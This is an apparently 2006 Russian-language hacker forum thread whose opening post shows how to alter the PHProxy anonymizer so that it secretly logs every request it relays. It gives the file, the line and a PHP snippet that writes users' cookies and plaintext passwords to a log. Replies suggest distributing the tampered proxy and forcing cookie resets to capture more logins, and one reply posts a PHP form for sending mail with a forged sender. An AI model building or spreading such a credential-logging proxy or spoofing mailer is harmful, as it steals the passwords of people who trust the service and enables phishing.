PDA

Просмотр полной версии : Анонимайзер =)

bul.666
30.10.2006, 17:38
Вообщем буду краток...
Воруем пароли с помощью анонимайзера

Недавно решил написать анонимайзер... Но так и не начал, так как появилась другая идея! Вести лог запросов с моего анонимайзера... Ведь там хрогиться много чего интересного, например Наши куки, да что куки там пароль в открытом виде! =)

Например: Мы зашли на форум античата через скирпт и сразу пошли авторизоваться... При авторизации отправляемый пакет выглядит следующим образом:
POST /login.php HTTP/1.0
Host: forum.antichat.ru:80
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1) Gecko/20061010 Firefox/2.0
Referer: http://forum.antichat.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 151

vb_login_username=[НАШ_ЛОГИН]&vb_login_password=[НАШ ПАРОЛЬ]&cookieuser=1&do=login&forceredirect=1&vb_login_md5password=
Как видно наш пароль виден! (с)

Поэтому не решил заморачиваться писать его, а просто изменил уже готовый...

Я взял PHProxy 0.4 (Взять его можно тут (http://whitefyre.com/poxy/) )
Начал изучать его работу и искал место, где он отправляет пакеты на сервер... Это место я нашел! (Действительно, писал бы я ето, еслиб не нашел?...) =)
В файле PHProxy.class.php на линии 713.
$this->request_headers = $headers;
Тут все данные собираются в одну переменну, т.е. в готовый пакет... Именно этот пакет то нам и нужен...
Осталось тока его сохранять в файл при каждой отправке... Делается это просто:

$this->request_headers = $headers;
$txt = fopen ("log.txt","a");
fputs($txt,$headers."\r\n=================================\r\n");
fclose($txt);
Теперь все пакеты будут отправляться на сервер и одновременно записоваться в лог...
Конечно txt файл не очень удобен, но им и не ограничевается! Можно создать базу данных, куда будут запихиваться пакеты... Для удобства можно, чтобы каждая таблица имела имя хоста а вней уже все пакеты с него... Вообщем простор есть =)

ЗЫ. Сразу скажу, что PHProxy использовал на апаче, причем удачно, на сайты не загружал =)
вы можете использовать любой другой анонимайзер =)
ЗЗЫ. Извиняюсь, если криво оформлено, или подобная статья уже есть... Или если это вообще бред... =)
Думаю и статьей это трудно назвать...

Интересно станите ли вы доверять им после прочтенного?
(с) bul666
Ch3ck
30.10.2006, 17:42
Ну теперь начинай распространять обновлённый аномайзер!
bul.666
30.10.2006, 17:45
Ну теперь начинай распространять обновлённый аномайзер!
Кстати... Сначала вообще решил написать Antichat's Анонимайзер и поместить в Избранное... =))))
Sn@k3
30.10.2006, 17:51
эххххххх бульба) приболел? во лови и не парься)
mail.php

<?
print("<!-- coded Sn@k3 2006 Ma1l S3nd (c) -->
<meta Content-type: text/plain; charset=windows-1253>
<html>
<head><title>Ma1l S3nD 0.1</title><body background='1010.JPG'></head><hr width='80%' color='#555555'><center><h1>Ma1l S3nD 0.1</h1></center><hr width='80%' color='#555555' />
<form name='Send' method='post' action='mailer.php'>
<input type='text'name='poluchatel' value=''>:poluchatel@mail.ru<br>
<input type='text' name='otpravitel' value=''>:otpravitel@mail.ru or Anton <оtprаvitel@mail.ru><br>
<input type='text' name='subj' value='Превед...'>

<input type='radio' checked='checked' tabindex='1' name='tipe' value='html'>:html <input type='radio' name='tipe' value='plain'>:text
<br>
<textarea name='messaga' rows='4' cols='110' value='Сообщение'></textarea><input type='submit' name='send' value='отправить'>
</form><hr width='100%' color='#f01f1f' /><center><a href='http://Snak3.microsoftt.ru' title='Перейти на главную страницу'>Snak3.microsoftt.ru 2006 (c)</a></center><hr width='100%' color='#f01f1f' />
</html>");
?>


<?
if($poluchatel)
{
if($otpravitel)
{
if($messaga)
{

$to = "$poluchatel" . ", " ;
$subject = "$subj";
$message = $messaga;

$headers = "MIME-Version: 1.0
";
$headers .= "Content-type: text/$tipe; charset=iso-8859-1
";
$headers .= "From: $otpravitel
";
mail($to, $subject, $message, $headers);
echo('<body background="1010.jpg"><center><b><font color="green">Сообщение успешно отправлено</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');

}
else
{
echo('<body background="0101.jpg"><center><b><font color="red">Следует ввести текст сообщения!</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}

}
else
{
echo('<body background="0101.jpg"><center><b><font color="red">Введите отправителя письма, то есть ваш e-mail.</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}

}
else
{
echo('<body background="0101.jpg"><center><b><font color="red">Необходимо ввести получателя данного письма.</font></b></center><br><center><a href="http://Snak3.microsoftt.ru/mail/index.php">back</a></center>');
}
// Snak3.microsoftt.ru Sn@k3 ICQ 127924
?>
bul.666
30.10.2006, 17:53
2Sn@k3: Ну дык это отправка почты =) Ты это предлогаешь поставить вместо сохранения в файл?
Qwazar
30.10.2006, 18:10
Может тогда ещё юзеру будешь 1 раз куки сбрасывать? Чтобы 100% получать чистые пароли.
bul.666
30.10.2006, 18:16
Чтобы 100% получать чистые пароли.
А так какой процент?

При заходе через анонимайзер на форум, даже если вы до этого были авторизированы там, все равно придется заново проходить авторизацию... =)
Sn@k3
30.10.2006, 20:22
буль хз прочитал тока загаловок)